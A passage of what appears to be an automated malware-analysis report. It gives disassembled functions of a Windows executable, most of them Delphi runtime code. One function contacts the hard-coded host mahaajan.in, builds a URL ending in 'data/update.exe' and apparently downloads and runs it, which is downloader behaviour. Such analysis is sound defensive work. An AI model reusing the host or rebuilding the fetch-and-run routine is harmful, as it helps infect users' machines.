    • #12.WS2_32, ref: 00414C37
    • #11.WS2_32, ref: 00414C3E
    • WSAConnect.WS2_32, ref: 00414C62
    • #116.WS2_32, ref: 00414C6D
  • #19.WS2_32, ref: 00414E28
  • #16.WS2_32, ref: 00414E50
Strings
  • http://mahaajan.in/dd/, va: 00401118
  • %s %s, va: 00411BCC
  • http://%s%sdata/update.exe, va: 00411BD4
Address Instruction Meta Information
00414DC0 push ebp
00414DC1 mov ebp, esp
00414DC3 mov eax, 00001728h
00414DC8 call 004163B4h
00414DCD call 00414C90h
00414DD2 mov dword ptr [ebp-04h], eax
00414DD5 push 00000400h
00414DDA push 00000000h
00414DDC lea eax, dword ptr [ebp-00000408h]
00414DE2 push eax
00414DE3 call 00415F8Fh
00414DE8 add esp, 0Ch
00414DEB push 00401118h ASCII "http://mahaajan.in/dd/"
00414DF0 call 00414BA0h
00414DF5 add esp, 04h
00414DF8 mov dword ptr [ebp-00000410h], eax
00414DFE cmp dword ptr [ebp-00000410h], FFFFFFFFh
00414E05 jne 00414E0Eh
00414E07 xor eax, eax
00414E09 jmp 00414FD8h
00414E0E push 00000000h xrefs 00414E05
00414E10 mov ecx, dword ptr [ebp-04h]
00414E13 push ecx
00414E14 call 00415EDCh
00414E19 add esp, 04h
00414E1C push eax
00414E1D mov edx, dword ptr [ebp-04h]
00414E20 push edx
00414E21 mov eax, dword ptr [ebp-00000410h]
00414E27 push eax
00414E28 call dword ptr [00401064h] #19@WS2_32.DLL (Import)
00414E2E push 00000000h xrefs 00414EFC
00414E30 push 00000001h
00414E32 lea ecx, dword ptr [ebp-00000408h]
00414E38 push ecx
00414E39 call 00415EDCh
00414E3E add esp, 04h
00414E41 lea edx, dword ptr [ebp+eax-00000408h]
00414E48 push edx
00414E49 mov eax, dword ptr [ebp-00000410h]
00414E4F push eax
00414E50 call dword ptr [0040105Ch] #16@WS2_32.DLL (Import)
00414E56 mov dword ptr [ebp-00000614h], eax
00414E5C cmp dword ptr [ebp-00000614h], 00000000h
00414E63 je 00414F01h
00414E69 mov dword ptr [ebp-00000618h], 00000000h
00414E73 jmp 00414E84h
00414E75 mov ecx, dword ptr [ebp-00000618h] xrefs 00414EF7
00414E7B add ecx, 01h
00414E7E mov dword ptr [ebp-00000618h], ecx
00414E84 mov edx, dword ptr [ebp-00000618h] xrefs 00414E73
00414E8A movsx eax, byte ptr [ebp+edx-00000408h]
00414E92 test eax, eax
00414E94 je 00414EFCh
00414E96 mov ecx, dword ptr [ebp-00000618h]
00414E9C movsx edx, byte ptr [ebp+ecx-00000408h]
00414EA4 cmp edx, 0Dh
00414EA7 jne 00414EF7h
00414EA9 mov eax, dword ptr [ebp-00000618h]
00414EAF movsx ecx, byte ptr [ebp+eax-00000407h]
00414EB7 cmp ecx, 0Ah
00414EBA jne 00414EF7h
00414EBC mov edx, dword ptr [ebp-00000618h]
00414EC2 movsx eax, byte ptr [ebp+edx-00000406h]
00414ECA cmp eax, 0Dh
00414ECD jne 00414EF7h
00414ECF mov ecx, dword ptr [ebp-00000618h]
00414ED5 movsx edx, byte ptr [ebp+ecx-00000405h]
00414EDD cmp edx, 0Ah
00414EE0 jne 00414EF7h
00414EE2 mov eax, dword ptr [ebp-00000618h]
00414EE8 lea ecx, dword ptr [ebp+eax-00000404h]
00414EEF mov dword ptr [ebp-0000040Ch], ecx
00414EF5 jmp 00414EFCh
00414EF7 jmp 00414E75h xrefs 00414EA7, 00414EBA, 00414ECD, 00414EE0
00414EFC jmp 00414E2Eh xrefs 00414E94, 00414EF5
00414F01 push 00411BC4h xrefs 00414E63
00414F06 mov edx, dword ptr [ebp-0000040Ch]
00414F0C push edx
00414F0D call 00416027h
00414F12 add esp, 08h
00414F15 mov dword ptr [ebp-00000610h], eax
00414F1B mov dword ptr [ebp-0000161Ch], 00000001h
00414F25 jmp 00414F36h
00414F27 mov eax, dword ptr [ebp-0000161Ch] xrefs 00414F5B
00414F2D add eax, 01h
00414F30 mov dword ptr [ebp-0000161Ch], eax
00414F36 cmp dword ptr [ebp-0000161Ch], 04h xrefs 00414F25
00414F3D jnc 00414F5Dh
00414F3F push 00411BC8h
00414F44 push 00000000h
00414F46 call 00416027h
00414F4B add esp, 08h
00414F4E mov ecx, dword ptr [ebp-0000161Ch]
00414F54 mov dword ptr [ebp+ecx*4-00000610h], eax
00414F5B jmp 00414F27h
00414F5D mov edx, dword ptr [ebp-0000060Ch] xrefs 00414F3D
00414F63 push edx
00414F64 mov eax, dword ptr [ebp-00000610h]
00414F6A push eax
00414F6B push 00411BCCh ASCII "%s %s"
00414F70 lea ecx, dword ptr [ebp-00001618h]
00414F76 push ecx
00414F77 call 004141C0h
00414F7C add esp, 10h
00414F7F lea edx, dword ptr [ebp-00001618h]
00414F85 push edx
00414F86 call 00414CC0h
00414F8B add esp, 04h
00414F8E movzx eax, al
00414F91 test eax, eax
00414F93 jne 00414FD6h
00414F95 push 00401118h ASCII "http://mahaajan.in/dd/"
00414F9A push 00411BD4h ASCII "http://%s%sdata/update.exe"
00414F9F lea ecx, dword ptr [ebp-00001728h]
00414FA5 push ecx
00414FA6 call 004141C0h
00414FAB add esp, 0Ch
00414FB0 push 00000000h Count = 2
00414FB2 lea edx, dword ptr [ebp-00001728h]
00414FB8 push edx
00414FB9 push 00000000h
00414FBB call 00415030h
00414FC0 lea eax, dword ptr [ebp-00001728h]
00414FC6 push eax
00414FC7 call 00415120h
00414FCC add esp, 04h
00414FCF push 00000000h
00414FD1 call 00414AA0h
00414FD6 xor eax, eax xrefs 00414F93
00414FD8 mov esp, ebp xrefs 00414E09
00414FDA pop ebp
00414FDB retn 0004h function end
APIs
  • getaddrinfo.WS2_32, ref: 00413BEF
  • getaddrinfo.WS2_32, ref: 00413C32
  • getaddrinfo.WS2_32, ref: 00413C6B
  • getaddrinfo.WS2_32, ref: 00413C8E
  • FreeAddrInfoW.WS2_32, ref: 00413CCD
Strings
  • 0.0.0.0, va: 00413CF0
  • ::0, va: 00413D00
  • 127.0.0.1, va: 00413D0C
  • ::1, va: 00413D20
Address Instruction Meta Information
00413B90 push ebp xrefs 00413EC7, 00413EF5
00413B91 mov ebp, esp
00413B93 add esp, FFFFFFD8h
00413B96 push ebx
00413B97 push esi
00413B98 push edi
00413B99 mov esi, ecx
00413B9B lea edi, dword ptr [ebp-28h]
00413B9E mov ecx, 00000008h
00413BA3 rep movsd
00413BA5 mov edi, edx
00413BA7 mov ebx, eax
00413BA9 mov esi, dword ptr [ebp+08h]
00413BAC xor eax, eax
00413BAE mov dword ptr [ebp-08h], eax
00413BB1 xor eax, eax
00413BB3 push ebp
00413BB4 push 00413CD4h
00413BB9 push dword ptr fs:[eax]
00413BBC mov dword ptr fs:[eax], esp
00413BBF mov eax, esi
00413BC1 xor ecx, ecx
00413BC3 mov edx, 0000001Ch
00413BC8 call 00403030h
00413BCD cmp dword ptr [ebp-20h], 03h
00413BD1 jne 00413BFDh
00413BD3 xor eax, eax
00413BD5 mov dword ptr [ebp-20h], eax
00413BD8 xor eax, eax
00413BDA mov dword ptr [ebp-1Ch], eax
00413BDD lea eax, dword ptr [ebp-08h]
00413BE0 push eax
00413BE1 lea eax, dword ptr [ebp-28h]
00413BE4 push eax
00413BE5 push 00000000h
00413BE7 mov eax, ebx
00413BE9 call 00404878h
00413BEE push eax
00413BEF call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00413BF5 mov dword ptr [ebp-04h], eax
00413BF8 jmp 00413C97h
00413BFD mov eax, ebx xrefs 00413BD1
00413BFF mov edx, 00413CF0h ASCII "0.0.0.0"
00413C04 call 004047C4h
00413C09 je 00413C19h
00413C0B mov eax, ebx
00413C0D mov edx, 00413D00h ASCII "::0"
00413C12 call 004047C4h
00413C17 jne 00413C3Dh
00413C19 mov dword ptr [ebp-28h], 00000001h xrefs 00413C09
00413C20 lea eax, dword ptr [ebp-08h]
00413C23 push eax
00413C24 lea eax, dword ptr [ebp-28h]
00413C27 push eax
00413C28 mov eax, edi
00413C2A call 00404878h
00413C2F push eax
00413C30 push 00000000h
00413C32 call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00413C38 mov dword ptr [ebp-04h], eax
00413C3B jmp 00413C97h
00413C3D mov eax, ebx xrefs 00413C17
00413C3F mov edx, 00413D0Ch ASCII "127.0.0.1"
00413C44 call 004047C4h
00413C49 je 00413C59h
00413C4B mov eax, ebx
00413C4D mov edx, 00413D20h ASCII "::1"
00413C52 call 004047C4h
00413C57 jne 00413C76h
00413C59 lea eax, dword ptr [ebp-08h] xrefs 00413C49
00413C5C push eax
00413C5D lea eax, dword ptr [ebp-28h]
00413C60 push eax
00413C61 mov eax, edi
00413C63 call 00404878h
00413C68 push eax
00413C69 push 00000000h
00413C6B call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00413C71 mov dword ptr [ebp-04h], eax
00413C74 jmp 00413C97h
00413C76 lea eax, dword ptr [ebp-08h] xrefs 00413C57
00413C79 push eax
00413C7A lea eax, dword ptr [ebp-28h]
00413C7D push eax
00413C7E mov eax, edi
00413C80 call 00404878h
00413C85 push eax
00413C86 mov eax, ebx
00413C88 call 00404878h
00413C8D push eax
00413C8E call dword ptr [0042B44Ch] getaddrinfo@WS2_32.DLL (Hidden Import)
00413C94 mov dword ptr [ebp-04h], eax
00413C97 cmp dword ptr [ebp-04h], 00000000h xrefs 00413C3B, 00413C74, 00413BF8
00413C9B jne 00413CB6h
00413C9D cmp dword ptr [ebp-08h], 00000000h
00413CA1 je 00413CB6h
00413CA3 mov eax, dword ptr [ebp-08h]
00413CA6 mov ecx, dword ptr [eax+10h]
00413CA9 mov edx, esi
00413CAB mov eax, dword ptr [ebp-08h]
00413CAE mov eax, dword ptr [eax+18h]
00413CB1 call 00402890h
00413CB6 xor eax, eax xrefs 00413C9B, 00413CA1
00413CB8 pop edx
00413CBA pop ecx Count = 2
00413CBB mov dword ptr fs:[eax], edx
00413CBE push 00413CDBh
00413CC3 cmp dword ptr [ebp-08h], 00000000h xrefs 00413CD9
00413CC7 je 00413CD3h
00413CC9 mov eax, dword ptr [ebp-08h]
00413CCC push eax
00413CCD call dword ptr [0042B450h] FreeAddrInfoW@WS2_32.DLL (Hidden Import)
00413CD3 ret xrefs 00413CC7 function end
Address Instruction Meta Information
004040C4 mov dword ptr [0042C014h], 004011C8h xrefs 00406072
004040CE mov dword ptr [0042C018h], 004011D8h
004040D8 mov dword ptr [0042C638h], eax
004040DD xor eax, eax
004040DF mov dword ptr [0042C63Ch], eax
004040E4 mov dword ptr [0042C640h], edx
004040EA mov eax, dword ptr [edx+04h]
004040ED mov dword ptr [0042C02Ch], eax
004040F2 call 00403FBCh
004040F7 mov byte ptr [0042C034h], 00000000h
004040FE call 00404064h
00404103 ret function end
APIs
    • GetCPInfo.KERNEL32, ref: 0040B5ED
  • GetStringTypeExA.KERNEL32, ref: 0040B740
  • GetSystemMetrics.USER32, ref: 0040B76B
Address Instruction Meta Information
0040B64C push ebp xrefs 0040B7DE
0040B64D mov ebp, esp
0040B64F add esp, FFFFFE68h
0040B655 push ebx
0040B656 push esi
0040B657 push edi
0040B658 mov dword ptr [0042C738h], 00000409h
0040B662 mov dword ptr [0042C73Ch], 00000009h
0040B66C mov dword ptr [0042C740h], 00000001h
0040B676 call 004061ECh
0040B67B test eax, eax
0040B67D je 0040B684h
0040B67F mov dword ptr [0042C738h], eax
0040B684 test ax, ax xrefs 0040B67D
0040B687 je 0040B6A4h
0040B689 mov edx, eax
0040B68B and dx, 03FFh
0040B690 movzx edx, dx
0040B693 mov dword ptr [0042C73Ch], edx
0040B699 movzx eax, ax
0040B69C shr eax, 0Ah
0040B69F mov dword ptr [0042C740h], eax
0040B6A4 mov esi, 0040B7A0h xrefs 0040B687
0040B6A9 mov edi, 0042B130h
0040B6AE mov ecx, 00000008h
0040B6B3 rep movsd
0040B6B5 cmp dword ptr [0042B0E8h], 02h
0040B6BC jne 0040B769h
0040B6C2 call 0040B634h
0040B6C7 test al, al
0040B6C9 je 0040B6DEh
0040B6CB mov byte ptr [0042C745h], 00000000h
0040B6D2 mov byte ptr [0042C744h], 00000000h
0040B6D9 jmp 0040B797h
0040B6DE push ebp xrefs 0040B6C9
0040B6DF call 0040B5D4h
0040B6E4 pop ecx
0040B6E5 mov eax, 0042B130h
0040B6EA mov edx, 0040B7A0h
0040B6EF mov cl, 20h
0040B6F1 call 00403270h
0040B6F6 setne bl
0040B6F9 mov byte ptr [0042C744h], bl
0040B6FF test bl, bl
0040B701 je 0040B70Fh
0040B703 mov byte ptr [0042C745h], 00000000h
0040B70A jmp 0040B797h
0040B70F mov eax, 00000080h xrefs 0040B701
0040B714 lea edx, dword ptr [ebp-00000094h]
0040B71A mov byte ptr [edx], al xrefs 0040B723
0040B71C inc eax
0040B71D inc edx
0040B71E cmp eax, 00000100h
0040B723 jne 0040B71Ah
0040B725 lea eax, dword ptr [ebp-00000094h]
0040B72B lea edx, dword ptr [ebp-00000196h]
0040B731 push edx
0040B732 push 00000080h
0040B737 push eax
0040B738 push 00000002h
0040B73A mov eax, dword ptr [0042C738h] 00000409
0040B73F push eax
0040B740 call 004061E4h GetStringTypeExA@KERNEL32.DLL (Hidden Import)
0040B745 mov eax, 00000080h
0040B74A lea edx, dword ptr [ebp-00000196h]
0040B750 cmp word ptr [edx], 0002h xrefs 0040B765
0040B754 sete cl
0040B757 mov byte ptr [0042C745h], cl
0040B75D test cl, cl
0040B75F jne 0040B797h
0040B761 add edx, 02h
0040B764 dec eax
0040B765 jne 0040B750h
0040B767 jmp 0040B797h
0040B769 push 0000004Ah xrefs 0040B6BC
0040B76B call 004062BCh GetSystemMetrics@USER32.DLL (Hidden Import)
0040B770 test eax, eax
0040B772 setne al
0040B775 mov byte ptr [0042C745h], al
0040B77A push 0000002Ah
0040B77C call 004062BCh
0040B781 test eax, eax
0040B783 setne bl
0040B786 mov byte ptr [0042C744h], bl
0040B78C test bl, bl
0040B78E je 0040B797h
0040B790 push ebp
0040B791 call 0040B5D4h
0040B796 pop ecx
0040B797 pop edi xrefs 0040B78E, 0040B75F, 0040B767, 0040B70A, 0040B6D9
0040B798 pop esi
0040B799 pop ebx
0040B79A mov esp, ebp
0040B79C pop ebp
0040B79D ret function end
APIs
  • GetStdHandle.KERNEL32, ref: 00404215
  • WriteFile.KERNEL32, ref: 0040421B
  • MessageBoxA.USER32, ref: 00404254
Strings
  • Error, va: 0042B08C
  • Runtime error at 00000000, va: 0042B094
Address Instruction Meta Information
004041DC push ecx xrefs 004042A5
004041DD cmp byte ptr [0042C044h], 00000000h
004041E4 je 0040423Dh
004041E6 cmp word ptr [0042C218h], D7B2h
004041EF jne 00404205h
004041F1 cmp dword ptr [0042C220h], 00000000h
004041F8 jbe 00404205h
004041FA mov eax, 0042C214h
004041FF call dword ptr [0042C230h]
00404205 push 00000000h xrefs 004041EF, 004041F8
00404207 lea eax, dword ptr [esp+04h]
0040420B push eax
0040420C push 0000001Eh
0040420E push 0042B094h ASCII "Runtime error at 00000000"
00404213 push FFFFFFF5h
00404215 call 004011C0h GetStdHandle@KERNEL32.DLL (Hidden Import)
0040421A push eax
0040421B call 004011F8h WriteFile@KERNEL32.DLL (Hidden Import)
00404220 push 00000000h
00404222 lea eax, dword ptr [esp+04h]
00404226 push eax
00404227 push 00000002h
00404229 push 00404264h
0040422E push FFFFFFF5h
00404230 call 004011C0h
00404235 push eax
00404236 call 004011F8h
0040423B pop edx
0040423C ret function end
0040423D cmp byte ptr [0042B034h], 00000000h xrefs 004041E4
00404244 jne 00404259h
00404246 push 00000000h
00404248 push 0042B08Ch ASCII "Error"
0040424D push 0042B094h ASCII "Runtime error at 00000000"
00404252 push 00000000h
00404254 call 00401220h MessageBoxA@USER32.DLL (Hidden Import)
00404259 pop edx xrefs 00404244
0040425A ret function end
APIs
  • GetFileSize.KERNEL32, ref: 00403000
Address Instruction Meta Information
00402FE4 push ebx xrefs 00402F87
00402FE5 push esi
00402FE6 mov ebx, eax
00402FE8 or esi, FFFFFFFFh
00402FEB mov ax, word ptr [ebx+04h]
00402FEF cmp ax, 0000D7B0h
00402FF3 jbe 0040301Eh
00402FF5 cmp ax, 0000D7B3h
00402FF9 jnbe 0040301Eh
00402FFB push 00000000h
00402FFD mov eax, dword ptr [ebx]
00402FFF push eax
00403000 call 004011B8h GetFileSize@KERNEL32.DLL (Hidden Import)
00403005 mov esi, eax
00403007 cmp esi, FFFFFFFFh
0040300A jne 00403013h
0040300C call 00402820h
00403011 jmp 00403028h
00403013 mov eax, esi xrefs 0040300A
00403015 xor edx, edx
00403017 div dword ptr [ebx+08h]
0040301A mov esi, eax
0040301C jmp 00403028h
0040301E mov eax, 00000067h xrefs 00402FF3, 00402FF9
00403023 call 00402810h
00403028 mov eax, esi xrefs 0040301C, 00403011
0040302A pop esi
0040302B pop ebx
0040302C ret function end
APIs
  • GetFullPathNameA.KERNEL32, ref: 00407A2F
Address Instruction Meta Information
00407A10 push ebx xrefs 0041234F, 004122EA
00407A11 push esi
00407A12 add esp, FFFFFEF8h
00407A18 mov esi, edx
00407A1A mov ebx, eax
00407A1C push esp
00407A1D lea eax, dword ptr [esp+08h]
00407A21 push eax
00407A22 push 00000104h
00407A27 mov eax, ebx
00407A29 call 00404878h
00407A2E push eax
00407A2F call 004061A4h GetFullPathNameA@KERNEL32.DLL (Hidden Import)
00407A34 mov ecx, eax
00407A36 lea edx, dword ptr [esp+04h]
00407A3A mov eax, esi
00407A3C call 004044CCh
00407A41 add esp, 00000108h
00407A47 pop esi
00407A48 pop ebx
00407A49 ret function end
APIs
  • GetCurrentThreadId.KERNEL32, ref: 0040BCE4
Address Instruction Meta Information
0040BCE0 push ebp xrefs 0040BD04, 0040BD85
0040BCE1 mov ebp, esp
0040BCE3 push ecx
0040BCE4 call 00406184h GetCurrentThreadId@KERNEL32.DLL (Hidden Import)
0040BCE9 mov word ptr [ebp-02h], ax
0040BCED mov al, byte ptr [ebp-02h]
0040BCF0 xor al, byte ptr [ebp-01h]
0040BCF3 and al, 0Fh
0040BCF5 pop ecx
0040BCF6 pop ebp
0040BCF7 ret function end
APIs
    • ResetEvent.KERNEL32, ref: 00412EF6
  • WaitForSingleObject.KERNEL32, ref: 00412F06
Address Instruction Meta Information
00412EFC push ebx xrefs 00412F85
00412EFD mov ebx, eax
00412EFF push ebx
00412F00 mov eax, dword ptr [0042C848h] 00000048
00412F05 push eax
00412F06 call 0040629Ch WaitForSingleObject@KERNEL32.DLL (Hidden Import)
00412F0B test eax, eax
00412F0D jne 00412F14h
00412F0F call 00412EF0h
00412F14 pop ebx xrefs 00412F0D
00412F15 ret function end
APIs
  • VirtualQuery.KERNEL32, ref: 0040A695
  • GetModuleFileNameA.KERNEL32, ref: 0040A6D4
  • LoadStringA.USER32, ref: 0040A76A
Address Instruction Meta Information
0040A678 push ebp xrefs 0040A80F
0040A679 mov ebp, esp
0040A67B add esp, FFFFFBA8h
0040A681 push ebx
0040A682 push esi
0040A683 push edi
0040A684 mov dword ptr [ebp-04h], ecx
0040A687 mov ebx, edx
0040A689 mov esi, eax
0040A68B push 0000001Ch
0040A68D lea eax, dword ptr [ebp-00000330h]
0040A693 push eax
0040A694 push ebx
0040A695 call 00406294h VirtualQuery@KERNEL32.DLL (Hidden Import)
0040A69A cmp dword ptr [ebp-00000320h], 00001000h
0040A6A4 jne 0040A6C2h
0040A6A6 push 00000105h
0040A6AB lea eax, dword ptr [ebp-00000212h]
0040A6B1 push eax
0040A6B2 mov eax, dword ptr [ebp-0000032Ch]
0040A6B8 push eax
0040A6B9 call 004061C4h
0040A6BE test eax, eax
0040A6C0 jne 0040A6E5h
0040A6C2 push 00000105h xrefs 0040A6A4
0040A6C7 lea eax, dword ptr [ebp-00000212h]
0040A6CD push eax
0040A6CE mov eax, dword ptr [0042C660h] 00400000
0040A6D3 push eax
0040A6D4 call 004061C4h GetModuleFileNameA@KERNEL32.DLL (Hidden Import)
0040A6D9 mov eax, ebx
0040A6DB call 0040A66Ch
0040A6E0 mov dword ptr [ebp-08h], eax
0040A6E3 jmp 0040A6EEh
0040A6E5 sub ebx, dword ptr [ebp-0000032Ch] xrefs 0040A6C0
0040A6EB mov dword ptr [ebp-08h], ebx
0040A6EE lea eax, dword ptr [ebp-00000212h] xrefs 0040A6E3
0040A6F4 mov dl, 5Ch
0040A6F6 call 0040B4F8h
0040A6FB mov edx, eax
0040A6FD inc edx
0040A6FE lea eax, dword ptr [ebp-0000010Dh]
0040A704 mov ecx, 00000104h
0040A709 call 00407AE8h
0040A70E mov ebx, 0040A7F8h
0040A713 mov edi, 0040A7F8h
0040A718 mov eax, esi
0040A71A mov edx, dword ptr [00406664h] 004066B0
0040A720 call 00403894h
0040A725 test al, al
0040A727 je 0040A74Ah
0040A729 mov eax, dword ptr [esi+04h]
0040A72C call 00404878h
0040A731 mov ebx, eax
0040A733 mov eax, ebx
0040A735 call 00407AC0h
0040A73A test eax, eax
0040A73C je 0040A74Ah
0040A73E cmp byte ptr [ebx+eax-01h], 0000002Eh
0040A743 je 0040A74Ah
0040A745 mov edi, 0040A7FCh
0040A74A push 00000100h xrefs 0040A727, 0040A73C, 0040A743
0040A74F lea eax, dword ptr [ebp-00000312h]
0040A755 push eax
0040A756 mov eax, dword ptr [0042B968h] 00406414
0040A75B mov eax, dword ptr [eax+04h]
0040A75E push eax
0040A75F mov eax, dword ptr [0042C660h] 00400000
0040A764 call 00405328h
0040A769 push eax
0040A76A call 004062C4h LoadStringA@USER32.DLL (Hidden Import)
0040A76F lea edx, dword ptr [ebp-00000458h]
0040A775 mov eax, dword ptr [esi]
0040A777 call 00403680h
0040A77C lea eax, dword ptr [ebp-00000458h]
0040A782 mov dword ptr [ebp-00000358h], eax
0040A788 mov byte ptr [ebp-00000354h], 00000004h
0040A78F lea eax, dword ptr [ebp-0000010Dh]
0040A795 mov dword ptr [ebp-00000350h], eax
0040A79B mov byte ptr [ebp-0000034Ch], 00000006h
0040A7A2 mov eax, dword ptr [ebp-08h]
0040A7A5 mov dword ptr [ebp-00000348h], eax
0040A7AB mov byte ptr [ebp-00000344h], 00000005h
0040A7B2 mov dword ptr [ebp-00000340h], ebx
0040A7B8 mov byte ptr [ebp-0000033Ch], 00000006h
0040A7BF mov dword ptr [ebp-00000338h], edi
0040A7C5 mov byte ptr [ebp-00000334h], 00000006h
0040A7CC lea eax, dword ptr [ebp-00000358h]
0040A7D2 push eax
0040A7D3 push 00000004h
0040A7D5 lea ecx, dword ptr [ebp-00000312h]
0040A7DB mov edx, dword ptr [ebp+08h]
0040A7DE mov eax, dword ptr [ebp-04h]
0040A7E1 call 00408008h
0040A7E6 mov eax, dword ptr [ebp-04h]
0040A7E9 call 00407AC0h
0040A7EE pop edi
0040A7EF pop esi
0040A7F0 pop ebx
0040A7F1 mov esp, ebp
0040A7F3 pop ebp
0040A7F4 retn 0004h function end
APIs
  • LocalFree.KERNEL32, ref: 00401B0B
  • VirtualFree.KERNEL32, ref: 00401B2A
  • RtlDeleteCriticalSection.NTDLL, ref: 00401B9C
Address Instruction Meta Information
00401ACC push ebp xrefs 00405E83
00401ACD mov ebp, esp
00401ACF push ebx
00401AD0 cmp byte ptr [0042C5BCh], 00000000h
00401AD7 je 00401BA9h
00401ADD xor edx, edx
00401ADF push ebp
00401AE0 push 00401BA2h
00401AE5 push dword ptr fs:[edx]
00401AE8 mov dword ptr fs:[edx], esp
00401AEB cmp byte ptr [0042C045h], 00000000h
00401AF2 je 00401AFEh
00401AF4 push 0042C5C4h
00401AF9 call 00401364h
00401AFE mov byte ptr [0042C5BCh], 00000000h xrefs 00401AF2
00401B05 mov eax, dword ptr [0042C61Ch] 00000000
00401B0A push eax
00401B0B call 00401344h LocalFree@KERNEL32.DLL (Hidden Import)
00401B10 xor eax, eax
00401B12 mov dword ptr [0042C61Ch], eax
00401B17 mov ebx, dword ptr [0042C5E4h] 0042C5E4
00401B1D jmp 00401B31h
00401B1F push 00008000h xrefs 00401B37
00401B24 push 00000000h
00401B26 mov eax, dword ptr [ebx+08h]
00401B29 push eax
00401B2A call 00401354h VirtualFree@KERNEL32.DLL (Import)
00401B2F mov ebx, dword ptr [ebx]
00401B31 cmp ebx, 0042C5E4h xrefs 00401B1D
00401B37 jne 00401B1Fh
00401B39 mov eax, 0042C5E4h
00401B3E call 004013CCh
00401B43 mov eax, 0042C5F4h
00401B48 call 004013CCh
00401B4D mov eax, 0042C620h
00401B52 call 004013CCh
00401B57 mov eax, dword ptr [0042C5DCh] 00000000
00401B5C test eax, eax
00401B5E je 00401B77h
00401B60 mov edx, dword ptr [eax] xrefs 00401B75
00401B62 mov dword ptr [0042C5DCh], edx
00401B68 push eax
00401B69 call 00401344h
00401B6E mov eax, dword ptr [0042C5DCh] 00000000
00401B73 test eax, eax
00401B75 jne 00401B60h
00401B77 xor eax, eax xrefs 00401B5E
00401B79 pop edx
00401B7B pop ecx Count = 2
00401B7C mov dword ptr fs:[eax], edx
00401B7F push 00401BA9h
00401B84 cmp byte ptr [0042C045h], 00000000h xrefs 00401BA7
00401B8B je 00401B97h
00401B8D push 0042C5C4h
00401B92 call 0040136Ch
00401B97 push 0042C5C4h xrefs 00401B8B
00401B9C call 00401374h RtlDeleteCriticalSection@NTDLL.DLL (Hidden Import)
00401BA1 ret function end
00401BA9 pop ebx xrefs 00401AD7
00401BAA pop ebp
00401BAB ret function end
APIs
  • GetLocaleInfoA.KERNEL32, ref: 0040A12A
Address Instruction Meta Information
0040A10C push ebp xrefs 0040A19C, 0040A3BB, 0040A482, 0040B80A, 0040B82C, 0040B850, 0040B89A, 0040B8D1, 0040B8FE, 0040B93E, 0040B960, 0040B992, 0040B9D1, 0040B9F4
0040A10D mov ebp, esp
0040A10F add esp, FFFFFF00h
0040A115 push ebx
0040A116 push esi
0040A117 mov esi, ecx
0040A119 mov ebx, dword ptr [ebp+08h]
0040A11C push 00000100h
0040A121 lea ecx, dword ptr [ebp-00000100h]
0040A127 push ecx
0040A128 push edx
0040A129 push eax
0040A12A call 004061BCh GetLocaleInfoA@KERNEL32.DLL (Hidden Import)
0040A12F test eax, eax
0040A131 jle 0040A145h
0040A133 mov ecx, eax
0040A135 dec ecx
0040A136 lea edx, dword ptr [ebp-00000100h]
0040A13C mov eax, ebx
0040A13E call 004044CCh
0040A143 jmp 0040A14Eh
0040A145 mov eax, ebx xrefs 0040A131
0040A147 mov edx, esi
0040A149 call 00404430h
0040A14E pop esi xrefs 0040A143
0040A14F pop ebx
0040A150 mov esp, ebp
0040A152 pop ebp
0040A153 retn 0004h function end
APIs
  • GetACP.KERNEL32, ref: 0040B59F
Address Instruction Meta Information
0040B560 push ebp xrefs 0040B5E7
0040B561 mov ebp, esp
0040B563 add esp, FFFFFFF4h
0040B566 push ebx
0040B567 xor edx, edx
0040B569 mov dword ptr [ebp-0Ch], edx
0040B56C xor edx, edx
0040B56E push ebp
0040B56F push 0040B5C4h
0040B574 push dword ptr fs:[edx]
0040B577 mov dword ptr fs:[edx], esp
0040B57A push 00000007h
0040B57C lea edx, dword ptr [ebp-07h]
0040B57F push edx
0040B580 push 00001004h
0040B585 push eax
0040B586 call 004061BCh
0040B58B lea eax, dword ptr [ebp-0Ch]
0040B58E lea edx, dword ptr [ebp-07h]
0040B591 mov ecx, 00000007h
0040B596 call 0040464Ch
0040B59B mov eax, dword ptr [ebp-0Ch]
0040B59E push eax
0040B59F call 00406174h GetACP@KERNEL32.DLL (Hidden Import)
0040B5A4 mov edx, eax
0040B5A6 pop eax
0040B5A7 call 00407608h
0040B5AC mov ebx, eax
0040B5AE xor eax, eax
0040B5B0 pop edx
0040B5B2 pop ecx Count = 2
0040B5B3 mov dword ptr fs:[eax], edx
0040B5B6 push 0040B5CBh
0040B5BB lea eax, dword ptr [ebp-0Ch] xrefs 0040B5C9
0040B5BE call 004043DCh
0040B5C3 ret function end
APIs
  • ResetEvent.KERNEL32, ref: 00412EF6
Address Instruction Meta Information
00412EF0 mov eax, dword ptr [0042C848h] 00000048 xrefs 00412F8C, 00412F0F
00412EF5 push eax
00412EF6 call 00406264h ResetEvent@KERNEL32.DLL (Hidden Import)
00412EFB ret function end
APIs
  • InitializeCriticalSection.KERNEL32, ref: 0040F586
Address Instruction Meta Information
0040F4F8 push ebp
0040F4F9 mov ebp, esp
0040F4FB xor eax, eax
0040F4FD push ebp
0040F4FE push 0040F599h
0040F503 push dword ptr fs:[eax]
0040F506 mov dword ptr fs:[eax], esp
0040F509 sub dword ptr [0042C818h], 01h
0040F510 jnc 0040F58Bh
0040F512 mov eax, 0042C7F8h
0040F517 call 0040F0F4h
0040F51C mov eax, 0040D834h
0040F521 mov dword ptr [0042C808h], eax
0040F526 mov eax, 0040D45Ch
0040F52B mov dword ptr [0042C80Ch], eax
0040F530 mov edx, 0040D36Ch
0040F535 mov dword ptr [0042C810h], edx
0040F53B mov dword ptr [0042C814h], eax
0040F540 mov eax, 0040DB20h
0040F545 mov edx, dword ptr [0042B870h] 0042B010
0040F54B mov dword ptr [edx], eax
0040F54D mov eax, 0040EDE8h
0040F552 mov edx, dword ptr [0042B790h] 0042B014
0040F558 mov dword ptr [edx], eax
0040F55A mov eax, 0040DE34h
0040F55F mov edx, dword ptr [0042B8BCh] 0042B018
0040F565 mov dword ptr [edx], eax
0040F567 mov eax, 0040E160h
0040F56C mov edx, dword ptr [0042B964h] 0042B01C
0040F572 mov dword ptr [edx], eax
0040F574 mov eax, 0040E888h
0040F579 mov edx, dword ptr [0042B8C8h] 0042B020
0040F57F mov dword ptr [edx], eax
0040F581 push 0042C820h
0040F586 call 00406234h InitializeCriticalSection@KERNEL32.DLL (Hidden Import)
